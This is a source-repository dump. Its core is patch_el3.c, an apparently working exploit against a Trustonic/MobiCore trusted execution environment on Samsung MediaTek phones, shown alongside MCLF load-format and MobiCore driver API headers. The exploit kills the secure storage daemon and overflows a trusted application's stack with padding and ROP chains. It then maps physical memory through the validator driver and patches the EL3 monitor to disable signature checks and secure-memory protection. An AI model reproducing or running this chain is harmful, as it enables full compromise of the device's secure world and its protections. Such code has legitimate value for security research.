Driver ID is used. */ 112 | uint32_t numThreads; /**< 113 | * 
114 |                                               * 
Number of threads (N) in a service depending on service type.

115 |                                               *
116 |                                               *   SERVICE_TYPE_SP_TRUSTLET: N = 1
117 |                                               *   SERVICE_TYPE_SYSTEM_TRUSTLET: N = 1
118 |                                               *   SERVICE_TYPE_DRIVER: N >= 1
119 |                                               *
120 | */ 121 | segmentDescriptor_t text; /**< Virtual text segment. */ 122 | segmentDescriptor_t data; /**< Virtual data segment. */ 123 | uint32_t bssLen; /**< Length of the BSS segment in bytes. MUST be at least 8 byte. */ 124 | uint32_t entry; /**< Virtual start address of service code. */ 125 | uint32_t serviceVersion; /**< Version of the interface the driver exports. */ 126 | 127 | // These should be put on next MCLF update: 128 | // mcSuid_t permittedSuid; /**< Starting 2.3: If nonzero, suid which is allowed to execute binary */ 129 | // uint32_t permittedHwCf; /**< Starting 2.3: If nonzero, hw configuration which is allowed to execute binary */ 130 | 131 | } mclfHeaderV2_t, *mclfHeaderV2_ptr; 132 | 133 | 134 | /** 135 | * Version 2.3 MCLF header. 136 | */ 137 | typedef struct { 138 | mclfHeaderV2_t mclfHeaderV2; 139 | mcSuid_t permittedSuid; /**< Starting 2.3: If nonzero, suid which is allowed to execute binary */ 140 | uint32_t permittedHwCfg; /**< Starting 2.3: If nonzero, hw configuration which is allowed to execute binary */ 141 | } mclfHeaderV23_t, *mclfHeaderV23_ptr; 142 | 143 | 144 | /** 145 | * Version 2.4 MCLF header. 146 | */ 147 | typedef struct { 148 | mclfHeaderV23_t mclfHeaderV2; 149 | uint32_t gp_level; /**=2.5) 169 | * 170 | * `mcLibData` field describes McLib work buffer 171 | * and it is used for MCLF header versions <=2.4 172 | * In this case the buffer is a part of TA BSS section 173 | * 174 | * For MCLF header versions >=2.5 `mcLibData` field is not used anymore and 175 | * replaced by `mcLibData` field 176 | * RTM itself determines actual address in this case and sets `mcLibData` field value 177 | * 178 | * `heapSize` field describes default heap parameters and 179 | * it is used only for MCLF header versions >=2.5 180 | * 181 | */ 182 | 183 | typedef struct { 184 | union { 185 | segmentDescriptor_t mcLibData; /**< Segment for McLib data. 186 | Set at compile time. 187 | Required always. */ 188 | heapSize_t heapSize; /**< Initial and maximum heap sizes. 189 | Set by MobiConvert for extended-layout TAs */ 190 | } cfg; 191 | uint32_t mcLibBase; /**< McLib base address. 192 | Mobicore sets at load time for trustlets / drivers. 193 | Required always. */ 194 | } mclfIMD_t, *mclfIMD_ptr; 195 | 196 | 197 | 198 | /** 199 | * Version 2 MCLF text segment header. 200 | * Required to be present in MobiCore 1.2 components at address (0x1080). 201 | * This extension is initialized already at trustlet compile time, 202 | * but may be modified later by configuration tools and by MobiCore at load time. 203 | */ 204 | typedef struct { 205 | uint32_t version; /**< Version of the TextHeader structure. */ 206 | uint32_t textHeaderLen; /**< Size of this structure (fixed at compile time) */ 207 | uint32_t requiredFeat; /**< Flags to indicate features that Mobicore must understand/interprete when loading. 208 | Required always. */ 209 | uint32_t mcLibEntry; /**< Address for McLib entry. 210 | Mobicore sets at load time for trustlets / drivers. 211 | Required always. */ 212 | mclfIMD_t mcIMD; /**< McLib Internal Management Data */ 213 | uint32_t tlApiVers; /**< TlApi version used when building trustlet. 214 | Value set at compile time. 215 | Required always. */ 216 | uint32_t drApiVers; /**< DrApi version used when building trustlet. 217 | Value set at compile time for drivers. 0 for trustlets. 218 | Required always. */ 219 | uint32_t ta_properties; /**< address of _TA_Properties in the TA. */ 220 | } mclfTextHeader_t, *mclfTextHeader_ptr; 221 | 222 | // Version 2 /////////////////////////////////////////////////////////////////////////////////////////////////// 223 | /** 224 | * @addtogroup MCLF 225 | */ 226 | 227 | /** MCLF header */ 228 | typedef union { 229 | mclfIntro_t intro; /**< Intro for data structure identification. */ 230 | mclfHeaderV2_t mclfHeaderV2; /**< Version 2 header */ 231 | } mclfHeader_t, *mclfHeader_ptr; 232 | 233 | // Version 2.3 changes header definition 234 | // Above structure is hard-coded into many places. 235 | // So new changes are made into separate structure. 236 | #define MCLF_HEADER_SIZE_V23 (0x080) 237 | 238 | // Actual (known) length can be calculated using macro 239 | #define MCLF_HEADER_SIZE(version) ((version)>0x20002?(MCLF_HEADER_SIZE_V23):sizeof(mclfHeader_t)) 240 | 241 | // This is only minimum size, so nothing below this makes sense. 242 | #define MCLF_BINARY_MIN_SIZE(version) (MCLF_HEADER_SIZE_V23+sizeof(mclfTextHeader_t)) 243 | 244 | #endif /* MCLOADFORMAT_H_ */ 245 | 246 | -------------------------------------------------------------------------------- /el3_patcher/src/patch_el3.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include "MobiCoreDriverApi.h" 5 | #include "dbg.h" 6 | #include "tools.h" 7 | #include "ta_s7_sem.h" 8 | #include "ta_s7_validator.h" 9 | 10 | // GADGETS TA 11 | #define SEM_POP_R0_R1_R2_R3_R4_R5_R6_PC 0x3a6e + 1 12 | #define SEM_BLX_R4_POP_R3_R4_R5_PC 0x15696 + 1 13 | #define SEM_POP_R4_PC 0x10f8 + 1 14 | 15 | // GADGETS DRV 16 | #define DRV_POP_R0_R1_R2_R6_PC 0x9a5c + 1 17 | #define DRV_POP_R3_R4_R5_PC 0x1710 + 1 18 | #define DRV_DRAPIMAPPHYS_POP_R3_R4_R5_PC 0x1240E + 1 19 | #define DRV_STR_R4_AT_R5_POP_R4_R5_R6_PC 0x9df6 + 1 20 | #define TLAPI_ENTRY 0x7D01008 21 | 22 | // TEE Kernel / Monitor offsets 23 | #define OPCODE_THUMB_MOV_R0_1 0x0001F04F 24 | #define OPCODE_ARM64_MOV_X0_0 0xD2800000 25 | #define MTK_VIRT_BASE 0x07F00000 26 | // ROM:07F01E6C 03 F0 C1 F8 BL is_mappable 27 | #define MTK_PATCH_ADDR 0xFE500000 + (0x07F01E6C - MTK_VIRT_BASE) 28 | // ROM:000000000202841C 06 0A 00 94 BL set_or_unset_secure_modem_memory 29 | #define MON_PATCH1_ADDR 0x0202841C 30 | // ROM:000000000203D800 00 00 00 00+signature_check_enabled_0 DCQ 0 31 | #define MON_PATCH2_ADDR 0x0203D800 32 | #define VIRT_ADDR_MTK 0x60000 33 | #define VIRT_ADDR_MON1 0x61000 34 | #define VIRT_ADDR_MON2 0x62000 35 | 36 | #define P32(value) \ 37 | add_u32(payload, &pos, value); 38 | #define P64(value) \ 39 | add_u64(payload, &pos, value); 40 | #define ADD_PADDING(value, len) \ 41 | add_padding(payload, &pos, value, len); 42 | #define ADD_STR(str) \ 43 | add_str(payload, &pos, str); 44 | #define ADD_DATA(data, len) \ 45 | add_data(payload, &pos, data, len); 46 | 47 | void add_u32(uint8_t *payload, uint32_t *pos, uint32_t value) 48 | { 49 | uint32_t *p = (uint32_t *)(payload + *pos); 50 | p[0] = value; 51 | *pos += 4; 52 | } 53 | 54 | void add_u64(uint8_t *payload, uint32_t *pos, uint64_t value) 55 | { 56 | uint64_t *p = (uint64_t *)(payload + *pos); 57 | p[0] = value; 58 | *pos += 8; 59 | } 60 | 61 | void add_padding(uint8_t *payload, uint32_t *pos, uint8_t value, uint32_t len) 62 | { 63 | uint8_t *p = (uint8_t *)(payload + *pos); 64 | memset(p, value, len); 65 | *pos += len; 66 | } 67 | 68 | void add_str(uint8_t *payload, uint32_t *pos, char *str) 69 | { 70 | uint32_t len = strlen(str) + 1; 71 | uint8_t *p = (uint8_t *)(payload + *pos); 72 | memcpy(p, str, len); 73 | *pos += len; 74 | } 75 | 76 | void add_data(uint8_t *payload, uint32_t *pos, void *data, uint32_t len) 77 | { 78 | uint8_t *p = (uint8_t *)(payload + *pos); 79 | memcpy(p, data, len); 80 | *pos += len; 81 | } 82 | 83 | int load_ta(mcSessionHandle_t *session, unsigned char *tci, uint32_t tciLen, 84 | unsigned char *ta_data, uint32_t ta_len) 85 | { 86 | mcResult_t open_r = mcOpenDevice(MC_DEVICE_ID_DEFAULT); 87 | if (open_r != MC_DRV_OK) 88 | { 89 | err("mcOpenDevice\n"); 90 | return 1; 91 | } 92 | 93 | mcResult_t opentrustlet_r = mcOpenTrustlet( 94 | session, 95 | 0, 96 | ta_data, 97 | ta_len, 98 | tci, 99 | tciLen); 100 | if (opentrustlet_r != MC_DRV_OK) 101 | { 102 | return 1; 103 | } 104 | return 0; 105 | } 106 | 107 | int notify_ta(mcSessionHandle_t *session) 108 | { 109 | if (mcNotify(session) != MC_DRV_OK) 110 | { 111 | warn("mcNotify\n"); 112 | } 113 | if (mcWaitNotification(session, 20000) != MC_DRV_OK) 114 | { 115 | warn("mcWaitNotification\n"); 116 | } 117 | return 0; 118 | } 119 | 120 | int map_in_ta(mcSessionHandle_t *session, void *data, uint32_t len, uint32_t *addr_in_ta) 121 | { 122 | mcBulkMap_t map; 123 | if (mcMap(session, data, len, &map) != MC_DRV_OK) 124 | { 125 | return 1; 126 | } 127 | *addr_in_ta = map.sVirtualAddr; 128 | return 0; 129 | } 130 | 131 | int close_ta_session(mcSessionHandle_t *session) 132 | { 133 | mcCloseSession(session); 134 | return 0; 135 | } 136 | 137 | int close_secure_storage_session() 138 | { 139 | int secure_storage_pid = 0; 140 | // cat /proc/sys/kernel/pid_max : 5 chars + null + eol 141 | char pid_a[7] = {0}; 142 | int fd = open("/dev/.secure_storage/secure_storage_daemon.lock", O_RDONLY); 143 | if (fd < 0) 144 | { 145 | err("Can't open secure_storage_daemon.lock\n"); 146 | return 1; 147 | } 148 | if (read(fd, &pid_a, 6) <= 0) 149 | { 150 | err("Can't read secure_storage_daemon.lock\n"); 151 | return 1; 152 | } 153 | close(fd); 154 | secure_storage_pid = atoi(pid_a); 155 | printf("pid : %d\n", secure_storage_pid); 156 | kill(secure_storage_pid, 9); 157 | return 0; 158 | } 159 | 160 | int main(int argc, char **argv) 161 | { 162 | mcSessionHandle_t sem_session = {0}; 163 | mcSessionHandle_t drv_session = {0}; 164 | uint32_t tciLen = 0x20000; 165 | uint8_t *tci = mmap(NULL, 166 | PAGE_ALIGN(tciLen), 167 | PROT_READ | PROT_WRITE, 168 | MAP_ANONYMOUS | MAP_PRIVATE, 169 | 0, 170 | 0); 171 | 172 | uint32_t *wsm_mem = mmap(NULL, 173 | 0x1000, 174 | PROT_READ | PROT_WRITE, 175 | MAP_ANONYMOUS | MAP_PRIVATE, 176 | 0, 177 | 0); 178 | uint32_t *wsm_mem2 = mmap(NULL, 179 | 0x1000, 180 | PROT_READ | PROT_WRITE, 181 | MAP_ANONYMOUS | MAP_PRIVATE, 182 | 0, 183 | 0); 184 | 185 | if (load_ta(&sem_session, tci, tciLen, 186 | ta_s7_fffffffff0000000000000000000001b_tlbin, 187 | ta_s7_fffffffff0000000000000000000001b_tlbin_len)) 188 | { 189 | err("Can't load SEM TA\n"); 190 | return 1; 191 | } else { 192 | ok("SEM TA loaded\n"); 193 | } 194 | 195 | while (1) { 196 | /* secure storage daemon uses the driver, we need to kill it */ 197 | close_secure_storage_session(); 198 | if (load_ta(&drv_session, tci, 104, 199 | ta_s7_ffffffffd00000000000000000000004_tlbin, 200 | ta_s7_ffffffffd00000000000000000000004_tlbin_len)) { 201 | err("Can't load VALIDATOR DRV\n"); 202 | } else { 203 | ok("VALIDATOR DRV loaded\n"); 204 | break; 205 | } 206 | } 207 | 208 | uint32_t rop_chain_drv[] = { 209 | /* STEP 1 MAP MTK AND PATCH IT */ 210 | DRV_POP_R0_R1_R2_R6_PC, // map physical page, prepare arguments (1/2) 211 | VIRT_ADDR_MTK, // R0 (requested virtual address) 212 | 0x1000, // R1 (size to map) 213 | MTK_PATCH_ADDR & 0xFFFFF000, // R2 (physical address to map) 214 | 0, // R6 (unused) 215 | DRV_POP_R3_R4_R5_PC, // map physical page, prepare arguments (2/2) 216 | 0x103, // R3 (attributes : read + write) 217 | 0, // R4 (unused) 218 | 0, // R5 (unused) 219 | DRV_DRAPIMAPPHYS_POP_R3_R4_R5_PC, // Call DrApiMapPhys 220 | 0, // R3 (unused) 221 | OPCODE_THUMB_MOV_R0_1, // R4 (value to patch: mov r0, 1 in thumb mode) 222 | VIRT_ADDR_MTK + (MTK_PATCH_ADDR & 0xFFF), // R5 (virtual address to patch) 223 | DRV_STR_R4_AT_R5_POP_R4_R5_R6_PC, // Patch MTK ! 224 | 0, // R4 (unused) 225 | 0, // R5 (unused) 226 | 0, // R6 (unused) 227 | 228 | /* STEP 2 MAP MONITOR AND PATCH IT : don't set memory secure */ 229 | DRV_POP_R0_R1_R2_R6_PC, // map physical page, prepare arguments (1/2) 230 | VIRT_ADDR_MON1, // R0 (requested virtual address) 231 | 0x1000, // R1 (size to map) 232 | MON_PATCH1_ADDR & 0xFFFFF000, // R2 (physical address to map) 233 | 0, // R6 (unused) 234 | DRV_POP_R3_R4_R5_PC, // map physical page, prepare arguments (2/2) 235 | 0x103, // R3 (attributes : read + write) 236 | 0, // R4 (unused) 237 | 0, // R5 (unused) 238 | DRV_DRAPIMAPPHYS_POP_R3_R4_R5_PC, // Call DrApiMapPhys 239 | 0, // R3 (unused) 240 | OPCODE_ARM64_MOV_X0_0, // R4 (value to patch: mov x0, 0 in arm64) 241 | VIRT_ADDR_MON1 + (MON_PATCH1_ADDR & 0xFFF), // R5 (virtual address to patch) 242 | DRV_STR_R4_AT_R5_POP_R4_R5_R6_PC, // Patch Monitor ! 243 | 0, // R4 (unused) 244 | 0, // R5 (unused) 245 | 0, // R6 (unused) 246 | 247 | /* STEP 3 TEST MAP MONITOR AND PATCH IT : disable signature checks */ 248 | DRV_POP_R0_R1_R2_R6_PC, // map physical page, prepare arguments (1/2) 249 | VIRT_ADDR_MON2, // R0 (requested virtual address) 250 | 0x1000, // R1 (size to map) 251 | MON_PATCH2_ADDR & 0xFFFFF000, // R2 (physical address to map) 252 | 0, // R6 (unused) 253 | DRV_POP_R3_R4_R5_PC, // map physical page, prepare arguments (2/2) 254 | 0x103, // R3 (attributes : read + write) 255 | 0, // R4 (unused) 256 | 0, // R5 (unused) 257 | DRV_DRAPIMAPPHYS_POP_R3_R4_R5_PC, // Call DrApiMapPhys 258 | 0, // R3 (unused) 259 | 0, // R4 (value to patch: 0 disable signature checks) 260 | VIRT_ADDR_MON2 + (MON_PATCH2_ADDR & 0xFFF), // R5 (virtual address to patch) 261 | DRV_STR_R4_AT_R5_POP_R4_R5_R6_PC, // Patch Monitor ! 262 | 0, // R4 (unused) 263 | 0, // R5 (unused) 264 | 0, // R6 (unused) 265 | 266 | /* STEP 4 exit */ 267 | 0xC682 + 1, // lazy way to make driver exits 268 | }; 269 | 270 | uint32_t wsm_addr = 0; 271 | if (map_in_ta(&sem_session, wsm_mem, 0x1000, &wsm_addr)) { 272 | printf("can't map\n"); 273 | } 274 | uint32_t wsm_addr2 = 0; 275 | if (map_in_ta(&sem_session, wsm_mem2, 0x1000, &wsm_addr2)) { 276 | printf("can't map\n"); 277 | } 278 | 279 | wsm_mem[0] = 0xF; 280 | wsm_mem[1] = 0x0; // SPID 281 | wsm_mem[2] = wsm_addr + 12; 282 | 283 | wsm_mem[3 + 512 / 4] = 0x120 + 7 * 4 + sizeof(rop_chain_drv); // memcpy size 284 | 285 | memcpy(&wsm_mem[146], rop_chain_drv, sizeof(rop_chain_drv)); 286 | 287 | uint8_t *payload = tci; 288 | uint32_t pos = 0; 289 | 290 | strcpy((char *)wsm_mem2, "Exploit OK\n"); 291 | 292 | // driver_id : 0x00040002 293 | // cmd_id : 0xF 294 | // tlApi_entry : 0x7D01008 (check RTM task at tlApi_entry address : 0x108C) 295 | 296 | 297 | uint32_t rop_chain_sem[] = { 298 | SEM_POP_R0_R1_R2_R3_R4_R5_R6_PC, 299 | 8, // r0: API id (call_driver) 300 | 0x00040002, // r1: validator driver id 301 | wsm_addr, // r2: ipc memory to communicate with the driver 302 | 0, // r3 303 | 0, // r4 304 | 0, // r5 305 | 0, // r6 306 | SEM_POP_R4_PC, // pc 307 | TLAPI_ENTRY, 308 | SEM_BLX_R4_POP_R3_R4_R5_PC, // jump on TLAPI_ENTRY to start call_driver 309 | 0, // r3 310 | 0, // r4 311 | 0, // r5 312 | SEM_POP_R0_R1_R2_R3_R4_R5_R6_PC, 313 | 5, // r0 api id (print log) 314 | wsm_addr2, // r1 string to print 315 | 0, // r2 316 | 0, // r3 317 | 0, // r4 318 | 0, // r5 319 | 0, // r6 320 | TLAPI_ENTRY // jump on TLAPI_ENTRY to start print logggV 321 | }; 322 | 323 | P32(7) // CMD_ID 324 | ADD_PADDING('A', 0x11bc) // padding stack 325 | P32(wsm_addr) // R4 326 | P32(0x55555555) // R5 327 | P32(0x66666666) // R6 328 | P32(0x77777777) // R7 329 | P32(0x88888888) // R8 330 | ADD_DATA(rop_chain_sem, sizeof(rop_chain_sem)) // add rop_chain 331 | ADD_PADDING('A', 0x16808 - pos) // padding to len 332 | P32(0x11cc + sizeof(rop_chain_sem)) // memcpy len 333 | 334 | notify_ta(&sem_session); 335 | 336 | close_ta_session(&sem_session); 337 | close_ta_session(&drv_session); 338 | 339 | return 0; 340 | } 341 | -------------------------------------------------------------------------------- /el3_patcher/include/MobiCoreDriverApi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2014 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | /** 32 | * MobiCore Driver API. 33 | * 34 | * The MobiCore (MC) Driver API provides access functions to the t-base trusted execution environment and the contained Trusted Applications. 35 | */ 36 | #ifndef MCDRIVER_H_ 37 | #define MCDRIVER_H_ 38 | 39 | 40 | #ifndef MAP_ANONYMOUS 41 | #define MAP_ANONYMOUS 0x20 42 | #endif 43 | 44 | #if (!defined(__MC_CLIENT_LIB_API)) && __cplusplus 45 | #define __MC_CLIENT_LIB_API extern "C" 46 | #else 47 | #define __MC_CLIENT_LIB_API 48 | #endif // __cplusplus 49 | 50 | 51 | #include 52 | #ifndef WIN32 53 | #include 54 | #endif 55 | 56 | #include "mcUuid.h" 57 | #include "mcSpid.h" 58 | #include "mcVersionInfo.h" 59 | 60 | /* 61 | * MobiCore driver API error codes. 62 | * MAJOR part of error code is stable. 63 | * MCP part contains MCP result code. See MCI/mcimcp.h 64 | * DETAIL part may be used in testing for specific error code. 65 | * 66 | * Detail error codes may change in different releases 67 | * Please do not test DETAIL part when comparing error codes. 68 | */ 69 | #define MC_DRV_ERROR_MAJOR(ecode) ((ecode) & 0xFF) /**< Get MAJOR part of error code. */ 70 | #define MC_DRV_ERROR_MCP(ecode) (((ecode)>>8) & 0xFF) /**< Get MCP part of error code. */ 71 | #define MC_DRV_ERROR_DETAIL(ecode) (((ecode)>>16) & 0x0FFF) /**< Get detail part of error code. */ 72 | 73 | typedef uint32_t mcResult_t; 74 | /** 75 | * Return values of MobiCore driver functions. 76 | */ 77 | #define MC_DRV_OK 0x00000000 /**< Function call succeeded. */ 78 | #define MC_DRV_NO_NOTIFICATION 0x00000001 /**< No notification available. */ 79 | #define MC_DRV_ERR_NOTIFICATION 0x00000002 /**< Error during notification on communication level. */ 80 | #define MC_DRV_ERR_NOT_IMPLEMENTED 0x00000003 /**< Function not implemented. */ 81 | #define MC_DRV_ERR_OUT_OF_RESOURCES 0x00000004 /**< No more resources available. */ 82 | #define MC_DRV_ERR_INIT 0x00000005 /**< Driver initialization failed. */ 83 | #define MC_DRV_ERR_UNKNOWN 0x00000006 /**< Unknown error. */ 84 | #define MC_DRV_ERR_UNKNOWN_DEVICE 0x00000007 /**< The specified device is unknown. */ 85 | #define MC_DRV_ERR_UNKNOWN_SESSION 0x00000008 /**< The specified session is unknown. */ 86 | #define MC_DRV_ERR_INVALID_OPERATION 0x00000009 /**< The specified operation is not allowed. */ 87 | #define MC_DRV_ERR_INVALID_RESPONSE 0x0000000a /**< The response header from the MC is invalid. */ 88 | #define MC_DRV_ERR_TIMEOUT 0x0000000b /**< Function call timed out. */ 89 | #define MC_DRV_ERR_NO_FREE_MEMORY 0x0000000c /**< Can not allocate additional memory. */ 90 | #define MC_DRV_ERR_FREE_MEMORY_FAILED 0x0000000d /**< Free memory failed. */ 91 | #define MC_DRV_ERR_SESSION_PENDING 0x0000000e /**< Still some open sessions pending. */ 92 | #define MC_DRV_ERR_DAEMON_UNREACHABLE 0x0000000f /**< MC daemon not reachable */ 93 | #define MC_DRV_ERR_INVALID_DEVICE_FILE 0x00000010 /**< The device file of the kernel module could not be opened. */ 94 | #define MC_DRV_ERR_INVALID_PARAMETER 0x00000011 /**< Invalid parameter. */ 95 | #define MC_DRV_ERR_KERNEL_MODULE 0x00000012 /**< Error from Kernel Module, see DETAIL for errno. */ 96 | #define MC_DRV_ERR_BULK_MAPPING 0x00000013 /**< Error during mapping of additional bulk memory to session. */ 97 | #define MC_DRV_ERR_BULK_UNMAPPING 0x00000014 /**< Error during unmapping of additional bulk memory to session. */ 98 | #define MC_DRV_INFO_NOTIFICATION 0x00000015 /**< Notification received, exit code available. */ 99 | #define MC_DRV_ERR_NQ_FAILED 0x00000016 /**< Set up of NWd connection failed. */ 100 | 101 | #define MC_DRV_ERR_DAEMON_VERSION 0x00000017 /**< Wrong daemon version. */ 102 | #define MC_DRV_ERR_CONTAINER_VERSION 0x00000018 /**< Wrong container version. */ 103 | 104 | // those should become MCP or even detail codes on top of MC_DRV_ERR_MCP_ERROR 105 | #define MC_DRV_ERR_WRONG_PUBLIC_KEY 0x00000019 /**< System Trustlet public key is wrong. */ 106 | #define MC_DRV_ERR_CONTAINER_TYPE_MISMATCH 0x0000001a /**< Wrong container type(s). */ 107 | #define MC_DRV_ERR_CONTAINER_LOCKED 0x0000001b /**< Container is locked (or not activated). */ 108 | #define MC_DRV_ERR_SP_NO_CHILD 0x0000001c /**< SPID is not registered with root container. */ 109 | #define MC_DRV_ERR_TL_NO_CHILD 0x0000001d /**< UUID is not registered with sp container. */ 110 | #define MC_DRV_ERR_UNWRAP_ROOT_FAILED 0x0000001e /**< Unwrapping of root container failed. */ 111 | #define MC_DRV_ERR_UNWRAP_SP_FAILED 0x0000001f /**< Unwrapping of service provider container failed. */ 112 | #define MC_DRV_ERR_UNWRAP_TRUSTLET_FAILED 0x00000020 /**< Unwrapping of Trustlet container failed. */ 113 | 114 | // use separate numbers for those in the future 115 | #define MC_DRV_ERR_DEVICE_ALREADY_OPEN MC_DRV_ERR_INVALID_OPERATION /** < Device is already open. */ 116 | #define MC_DRV_ERR_SOCKET_CONNECT MC_DRV_ERR_DAEMON_UNREACHABLE /**< MC daemon socket not reachable. */ 117 | #define MC_DRV_ERR_SOCKET_WRITE MC_DRV_ERR_DAEMON_UNREACHABLE /**< MC daemon socket write error. */ 118 | #define MC_DRV_ERR_SOCKET_READ MC_DRV_ERR_DAEMON_UNREACHABLE /**< MC daemon socket read error. */ 119 | #define MC_DRV_ERR_SOCKET_LENGTH MC_DRV_ERR_DAEMON_UNREACHABLE /**< MC daemon socket read error. */ 120 | #define MC_DRV_ERR_DAEMON_SOCKET MC_DRV_ERR_DAEMON_UNREACHABLE /**< MC daemon had problems with socket. */ 121 | #define MC_DRV_ERR_DEVICE_FILE_OPEN MC_DRV_ERR_INVALID_DEVICE_FILE /**< The device file of the kernel module could not be opened. */ 122 | #define MC_DRV_ERR_NULL_POINTER MC_DRV_ERR_INVALID_PARAMETER /**< Null pointer passed as parameter. */ 123 | #define MC_DRV_ERR_TCI_TOO_BIG MC_DRV_ERR_INVALID_PARAMETER /**< Requested TCI length is too high. */ 124 | #define MC_DRV_ERR_WSM_NOT_FOUND MC_DRV_ERR_INVALID_PARAMETER /**< Requested TCI was not allocated with mallocWsm(). */ 125 | #define MC_DRV_ERR_TCI_GREATER_THAN_WSM MC_DRV_ERR_INVALID_PARAMETER /**< Requested TCI length is bigger than allocated WSM. */ 126 | #define MC_DRV_ERR_TRUSTLET_NOT_FOUND MC_DRV_ERR_INVALID_DEVICE_FILE /** < Trustlet could not be found. */ 127 | #define MC_DRV_ERR_TRUSTED_APPLICATION_NOT_FOUND MC_DRV_ERR_TRUSTLET_NOT_FOUND /** < Trusted Application could not be found. */ 128 | #define MC_DRV_ERR_DAEMON_KMOD_ERROR MC_DRV_ERR_DAEMON_UNREACHABLE /**< Daemon cannot use Kernel module as expected. */ 129 | #define MC_DRV_ERR_DAEMON_MCI_ERROR MC_DRV_ERR_DAEMON_UNREACHABLE /**< Daemon cannot use MCI as expected. */ 130 | #define MC_DRV_ERR_MCP_ERROR MC_DRV_ERR_DAEMON_UNREACHABLE /**< MobiCore Control Protocol error. See MC_DRV_ERROR_MCP(). */ 131 | #define MC_DRV_ERR_INVALID_LENGTH MC_DRV_ERR_NO_FREE_MEMORY /**< Invalid length. */ 132 | #define MC_DRV_ERR_KMOD_NOT_OPEN MC_DRV_ERR_NO_FREE_MEMORY /**< Device not open. */ 133 | #define MC_DRV_ERR_BUFFER_ALREADY_MAPPED MC_DRV_ERR_BULK_MAPPING /**< Buffer is already mapped to this Trusted Application. */ 134 | #define MC_DRV_ERR_BLK_BUFF_NOT_FOUND MC_DRV_ERR_BULK_UNMAPPING /**< Unable to find internal handle for buffer. */ 135 | 136 | #define MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN 0x00000021 /**< No device associated with connection. */ 137 | #define MC_DRV_ERR_DAEMON_WSM_HANDLE_NOT_FOUND MC_DRV_ERR_WSM_NOT_FOUND /**< Daemon could not find WSM handle. */ 138 | #define MC_DRV_ERR_DAEMON_UNKNOWN_SESSION MC_DRV_ERR_UNKNOWN_SESSION /**< The specified session is unknown to Daemon. */ 139 | 140 | #if TBASE_API_LEVEL >= 3 141 | // Installation errors 142 | #define MC_DRV_ERR_TA_HEADER_ERROR 0x00000021 /**< TA blob header is incorrect. */ 143 | #define MC_DRV_ERR_TA_ATTESTATION_ERROR 0x00000022 /**< TA blob attestation is incorrect. */ 144 | #endif /* TBASE_API_LEVEL */ 145 | 146 | #define MC_DRV_ERR_INTERRUPTED_BY_SIGNAL 0x00000023 /**< Interrupted system call. */ 147 | 148 | #if TBASE_API_LEVEL >= 5 149 | /** 150 | * Do we call these RESERVED_1, _2 etc? (as this file is public, or do we wash it?) 151 | */ 152 | #define MC_DRV_ERR_SERVICE_BLOCKED 0x00000024 /**< Service is blocked and opensession is thus not allowed. */ 153 | #define MC_DRV_ERR_SERVICE_LOCKED 0x00000025 /**< Service is locked and opensession is thus not allowed. */ 154 | #define MC_DRV_ERR_SERVICE_KILLED 0x00000026 /**< Service was killed by the TEE (due to an administrative command). */ 155 | #define MC_DRV_ERR_NO_FREE_INSTANCES 0x00000027 /**< All permitted instances to the service are used */ 156 | 157 | #endif /* TBASE_API_LEVEL >= 5 */ 158 | 159 | #define MAKE_MC_DRV_MCP_ERROR(mcpCode) (MC_DRV_ERR_MCP_ERROR | ((mcpCode&0x000FFFFF)<<8)) 160 | #define MAKE_MC_DRV_KMOD_WITH_ERRNO(theErrno) (MC_DRV_ERR_KERNEL_MODULE| (((theErrno)&0x0000FFFF)<<16)) 161 | 162 | /** Structure of Session Handle, includes the Session ID and the Device ID the Session belongs to. 163 | * The session handle will be used for session-based t-base communication. 164 | * It will be passed to calls which address a communication end point in the t-base environment. 165 | */ 166 | typedef struct { 167 | uint32_t sessionId; /**< t-base session ID */ 168 | uint32_t deviceId; /**< Device ID the session belongs to */ 169 | } mcSessionHandle_t; 170 | 171 | /** Information structure about additional mapped Bulk buffer between the Client Application (NWd) and 172 | * the Trusted Application (SWd). This structure is initialized from a Client Application by calling mcMap(). 173 | * In order to use the memory within a Trusted Application the Client Application has to inform the Trusted Application with 174 | * the content of this structure via the TCI. 175 | */ 176 | 177 | typedef struct { 178 | #if ( __WORDSIZE == 64 ) 179 | uint32_t sVirtualAddr; /**< The virtual address of the Bulk buffer regarding the address space of the Trusted Application, already includes a possible offset! */ 180 | #else 181 | void *sVirtualAddr; 182 | #endif 183 | uint32_t sVirtualLen; /**< Length of the mapped Bulk buffer */ 184 | } mcBulkMap_t; 185 | 186 | 187 | 188 | #define MC_DEVICE_ID_DEFAULT 0 /**< The default device ID */ 189 | #define MC_INFINITE_TIMEOUT ((int32_t)(-1)) /**< Wait infinite for a response of the MC. */ 190 | #define 